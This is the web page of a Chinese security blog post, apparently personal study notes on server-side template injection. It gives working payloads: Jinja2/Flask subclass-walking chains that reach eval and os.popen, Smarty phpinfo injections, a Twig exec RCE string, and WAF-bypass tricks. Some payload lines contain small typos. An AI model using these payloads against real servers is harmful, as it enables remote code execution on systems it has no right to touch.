<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="白尾青芳の小窝">
  <title>SSTI（Server-Side Template Injection，服务器端模板注入） | 白尾青芳の小窝</title>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;600;700&family=Space+Grotesk:wght@500;600&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="/css/styles.css?v=20260722-2148">
<meta name="generator" content="Hexo 8.1.1"></head>
<body>
  <video class="backdrop" autoplay muted loop playsinline preload="auto" aria-hidden="true">
    <source src="/images/wallpaper.mp4" type="video/mp4">
  </video>

  <button class="mobile-menu" id="menuToggle" type="button" aria-label="打开导航" aria-expanded="false">
    <span></span><span></span><span></span>
  </button>

  <aside class="sidebar" id="sidebar">
    <div class="profile">
      <img class="avatar" src="/images/fox-avatar.jpg" alt="白尾青芳头像">
      <p class="eyebrow">SECURITY · CODE · NOTES</p>
      <h1>白尾青芳</h1>
      <p class="motto">在每一次请求与响应之间，找到系统真实的边界。</p>
    </div>

    <nav class="main-nav" aria-label="主导航">
      <a class="" href="/"><i data-lucide="home"></i><span>博客首页</span></a>
      <a class="" href="/study/"><i data-lucide="book-open"></i><span>学习导航</span></a>
      <a href="/categories/Web-%E5%AE%89%E5%85%A8/"><i data-lucide="shield-check"></i><span>Web 安全</span></a>
      <a href="/categories/%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/"><i data-lucide="code-2"></i><span>开发笔记</span></a>
      <a class="" href="/archives/"><i data-lucide="archive"></i><span>文章归档</span></a>
      <a href="/about/"><i data-lucide="user-round"></i><span>关于我</span></a>
    </nav>

    <div class="sidebar-footer">
      <div class="social-links">
        <a target="_blank" rel="noopener" href="https://github.com/baiweiqingfang" aria-label="GitHub" title="GitHub"><svg viewBox="0 0 24 24" aria-hidden="true"><path fill="currentColor" d="M12 .5C5.65.5.5 5.65.5 12c0 5.1 3.29 9.43 7.86 10.96.58.1.79-.25.79-.56v-2.14c-3.2.7-3.87-1.36-3.87-1.36-.52-1.34-1.28-1.7-1.28-1.7-1.05-.72.08-.7.08-.7 1.16.08 1.77 1.2 1.77 1.2 1.03 1.76 2.7 1.25 3.36.96.1-.75.4-1.25.73-1.54-2.55-.29-5.24-1.28-5.24-5.68 0-1.25.45-2.28 1.19-3.08-.12-.29-.52-1.46.11-3.04 0 0 .97-.31 3.17 1.18.92-.26 1.9-.38 2.88-.39.98 0 1.96.13 2.88.39 2.2-1.49 3.16-1.18 3.16-1.18.63 1.58.23 2.75.11 3.04.74.8 1.19 1.83 1.19 3.08 0 4.42-2.69 5.39-5.25 5.67.41.36.78 1.06.78 2.14v3.17c0 .31.21.67.8.56A11.5 11.5 0 0 0 23.5 12C23.5 5.65 18.35.5 12 .5Z"/></svg></a>
        <a href="/atom.xml" aria-label="RSS" title="RSS"><i data-lucide="rss"></i></a>
      </div>
      <p>© 2026 白尾青芳 · Powered by Hexo</p>
    </div>
  </aside>

  <main class="content">
    <article class="article-page">
  <header class="article-header">
    <p class="eyebrow">learning</p>
    <h1>SSTI（Server-Side Template Injection，服务器端模板注入）</h1>
    <div class="post-meta">
      <time datetime="2026-03-22T06:20:41.000Z">2026.03.22</time>
      <span>6 分钟阅读</span>
    </div>
  </header>
  <div class="article-content">
    <h1 id="SSTI（Server-Side-Template-Injection，服务器端模板注入）"><a href="#SSTI（Server-Side-Template-Injection，服务器端模板注入）" class="headerlink" title="SSTI（Server-Side Template Injection，服务器端模板注入）"></a>SSTI（Server-Side Template Injection，服务器端模板注入）</h1><p>服务端接受了用户的输入，将其作为Web应用模板内容的一部分，在进行目标编译渲染的过程中，执行了用户插入的恶意内容</p>
<p>MTV(Model Template View)的开发模式中会经常用到模板(Template)</p>
<p>模型(Model)用来对数据进行操作,视图(View)用来处理业务逻辑</p>
<p>模板(Template)负责将页面展示给用户</p>
<p>核心:前后端分离,方便开发&#x2F;移植</p>
<h2 id="python模板注入"><a href="#python模板注入" class="headerlink" title="python模板注入"></a>python模板注入</h2><h3 id="Flask"><a href="#Flask" class="headerlink" title="Flask"></a>Flask</h3><p>源码：</p>
<p><img src="C:\Users\23214\AppData\Roaming\Typora\typora-user-images\image-20260321133849757.png" alt="image-20260321133849757"></p>
<p>payload1：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&amp;#123;% for c in [] .__class__.__base__.__subclasses__() %&amp;#125;</span><br><span class="line">&amp;#123;% if c .__name _== &#x27;catch_warnings&#x27; %&amp;#125;</span><br><span class="line">&amp;#123;% for b in c .__init__.__globals__. values() %&amp;#125;</span><br><span class="line">&amp;#123;% if b .__class__== &#123;&#125; .__class__%&amp;#125;</span><br><span class="line">&amp;#123;% if &#x27;eval&#x27; in b.keys() %&amp;#125;</span><br><span class="line">&amp;#123;&amp;#123; b[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#x27;) &amp;#125;&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endfor %&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endfor %&amp;#125;</span><br></pre></td></tr></table></figure>

<p>payload2：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&amp;#123;&amp;#123;&#x27;&#x27;.__class__.__mro__[1].__subclasses__()&amp;#125;&amp;#125;</span><br><span class="line">&amp;#123;% if c .__name _== &#x27;catch_warnings&#x27; %&amp;#125;</span><br><span class="line">&amp;#123;% for b in c .__init__.__globals__. values() %&amp;#125;</span><br><span class="line">&amp;#123;% if b .__class__== &#123;&#125; .__class__%&amp;#125;</span><br><span class="line">&amp;#123;% if &#x27;eval&#x27; in b.keys() %&amp;#125;</span><br><span class="line">&amp;#123;&amp;#123; b[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#x27;) &amp;#125;&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endfor %&amp;#125;</span><br><span class="line">&amp;#123;% endif %&amp;#125;</span><br><span class="line">&amp;#123;% endfor %&amp;#125;</span><br></pre></td></tr></table></figure>

<p>在旧版本的 Python&#x2F;Jinja2 中， warnings模块中的catch_warnings类_<em>init</em>_ 方法中保留了全局命名空间（globals） 的引用。这是一个“后门”。</p>
<p>全局变量里通常有一个 <code>__builtins__</code> 字典，里面包含了所有内置函数（如 eval, exec, import 等）。</p>
<p>常见可以利用的类：</p>
<table>
<thead>
<tr>
<th align="left">类名</th>
<th align="left">判断条件</th>
<th align="left">利用方式</th>
<th align="left">适用版本</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>catch_warnings</code></td>
<td align="left"><code>c.__name__ == &#39;catch_warnings&#39;</code></td>
<td align="left"><code>__globals__[&#39;eval&#39;]</code></td>
<td align="left">2.7-3.7</td>
</tr>
<tr>
<td align="left"><code>_wrap_close</code></td>
<td align="left"><code>c.__name__ == &#39;_wrap_close&#39;</code></td>
<td align="left"><code>__globals__[&#39;eval&#39;]</code></td>
<td align="left">3.5-3.9</td>
</tr>
<tr>
<td align="left"><code>Popen</code></td>
<td align="left"><code>c.__name__ == &#39;Popen&#39;</code></td>
<td align="left">直接执行命令</td>
<td align="left">全版本</td>
</tr>
<tr>
<td align="left"><code>warning</code></td>
<td align="left"><code>c.__name__ == &#39;warning&#39;</code></td>
<td align="left"><code>__globals__</code></td>
<td align="left">备选</td>
</tr>
<tr>
<td align="left"><code>ModuleSpec</code></td>
<td align="left"><code>c.__name__ == &#39;ModuleSpec&#39;</code></td>
<td align="left">复杂利用</td>
<td align="left">备选</td>
</tr>
</tbody></table>
<p>当字符被过滤时，可以使用十六进制编码进行绕过</p>
<h2 id="PHP模板注入"><a href="#PHP模板注入" class="headerlink" title="PHP模板注入"></a>PHP模板注入</h2><h3 id="payload-针对smarty3"><a href="#payload-针对smarty3" class="headerlink" title="payload(针对smarty3)"></a>payload(针对smarty3)</h3><p>1.查看版本</p>
<p>{$smarty.version}</p>
<p>2.运行php代码</p>
<p>{phpinfo()}</p>
<p>{if phpinfo()}{&#x2F;if}</p>
<h3 id="payload-针对smartyBC"><a href="#payload-针对smartyBC" class="headerlink" title="payload(针对smartyBC)"></a>payload(针对smartyBC)</h3><p>1.查看版本</p>
<p>{$smarty.version}</p>
<p>2.运行php代码</p>
<p>{phpinfo()}</p>
<p>{if phpinfo()X&#x2F;if}</p>
<h3 id="Twig"><a href="#Twig" class="headerlink" title="Twig"></a>Twig</h3><p>1.RCE</p>
<p>&#123;&#123;_self.env.registerUndefinedFilterCallback(“exec”)&#125;&#125;&#123;&#123;_self.env.getFilter(“whoami”)&#125;&#125;</p>
<h2 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h2><h3 id="绕过单双引号"><a href="#绕过单双引号" class="headerlink" title="绕过单双引号"></a>绕过单双引号</h3><p>1.利用chr()</p>
<p>2.利用request</p>
<h3 id="绕过方括号"><a href="#绕过方括号" class="headerlink" title="绕过方括号"></a>绕过方括号</h3><p>使用_<em>getitem</em>_()或pop()</p>
<h3 id="绕过关键字-class-base-等"><a href="#绕过关键字-class-base-等" class="headerlink" title="绕过关键字(_class_,__base__等)"></a>绕过关键字(_<em>class</em>_,__base__等)</h3><p>1.base64编码绕过(仅适用于python22)</p>
<p>2.字符串拼接绕过</p>
<h3 id="绕过下划线"><a href="#绕过下划线" class="headerlink" title="绕过下划线"></a>绕过下划线</h3><p>使用request</p>

  </div>
</article>

  </main>

  <button class="back-to-top" id="backToTop" type="button" aria-label="回到顶部"><i data-lucide="arrow-up"></i></button>
  <script src="https://unpkg.com/lucide@latest/dist/umd/lucide.min.js"></script>
  <script src="/js/main.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>




